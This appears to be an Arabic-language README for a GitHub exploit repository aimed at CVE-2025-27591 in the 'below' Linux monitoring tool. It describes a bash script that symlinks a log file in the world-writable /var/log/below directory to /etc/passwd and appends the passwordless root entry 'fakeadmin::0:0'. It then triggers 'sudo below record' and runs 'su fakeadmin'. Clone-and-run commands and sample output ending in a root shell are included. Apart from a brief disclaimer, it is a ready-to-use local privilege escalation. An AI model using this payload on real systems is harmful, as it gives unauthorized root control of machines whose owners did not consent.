
🔥 استغلال تصعيد الامتيازات المحلية لـ CVE-2025-27591 | يستخدم دليل سجلات قابل للكتابة عالميًا في Below للحصول على صلاحية الجذر عبر حقن /etc/passwd
below🛑 تنويه: هذا الاستغلال مُقدم لأغراض تعليمية واختبار أمني مُصرَّح به فقط. الاستخدام غير المصرح به قد يكون غير قانوني.
below هي أداة مراقبة أداء طُوِّرَت بواسطة Facebook لأنظمة Linux. الإصدارات من below السابقة للإصدار المُصحَّح تتأثر بثغرة حرجة تسمح للمستخدمين غير المميزين بتصعيد الصلاحيات إلى الجذر عبر استغلال أدلة سجلات قابلة للكتابة عالمياً ومعالجة سجلات غير آمنة.
يقوم هذا السكريبت Bash بما يلي:
فحص وجود دليل قابل للكتابة عالمياً:
/var/log/below قابلاً للكتابة عالمياً (علامة خطر).تحضير هجوم الرابط الرمزي:
error_root.log الحالي (إن وجد) وينشئ رابطاً رمزياً إلى /etc/passwd.بناء الحمولة:
/etc/passwd:
fakeadmin::0:0:fakeadmin:/root:/bin/bash
تشغيل التسجيل:
sudo below record لإجبار البرنامج الثغري على كتابة السجلات.الحصول على وصول جذر:
su fakeadmin للحصول على شل جذر بدون طلب كلمة مرور.CVE-2025-27591/
├── exploit.sh
├── README.md
قبل تشغيل الاستغلال، تأكد من توفر ما يلي:
/usr/bin/below/var/log/belowsudo لتنفيذ: sudo below recordln (لإنشاء الروابط الرمزية)su (لتبديل المستخدمين)timeout (للتحكم في وقت التنفيذ)whoami (لفحص الصلاحية)# 1. استنساخ المستودع
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591
# 2. جعل السكريبت قابل للتنفيذ
chmod +x exploit.sh
# 3. تنفيذ الاستغلال
./exploit.sh
[*] جاري التحقق من وجود ثغرة CVE-2025-27591...
[+] /var/log/below قابل للكتابة عالمياً.
[!] تم العثور على ملف سجل موجود: جاري إزالته...
[+] تم إنشاء رابط رمزي: /var/log/below/error_root.log -> /etc/passwd
[*] جاري كتابة السطر الخبيث إلى /tmp/fakeadmin
[*] جاري تشغيل التسجيل عبر 'sudo below record'...
[+] تم تنفيذ 'below record' (أو انتهت المهلة)
[*] محاولة كتابة الحمولة إلى /etc/passwd عبر الرابط الرمزي...
[+] تم إلحاق الحمولة بنجاح.
[*] محاولة التبديل إلى شل الجذر باستخدام 'su fakeadmin'...
root@target:/# whoami
root
| الحقل | القيمة |
|---|
| CVE-ID | CVE-2025-27591 |
| الخطورة | 🔥 حرجة (CVSS ≈ 7.8 - 8.8) |
| متجه الهجوم | محلي |
| التأثير | تصعيد صلاحيات إلى الجذر (UID=0) |
| نوع الاستغلال | استغلال الروابط الرمزية / حقن ملفات السجلات |
| التطبيق المتأثر | below – يُثبَّت عادةً في /usr/bin/below |
| السبب الجذري | كتابة ملفات غير آمنة إلى /var/log/below/ دون فحص الأذونات |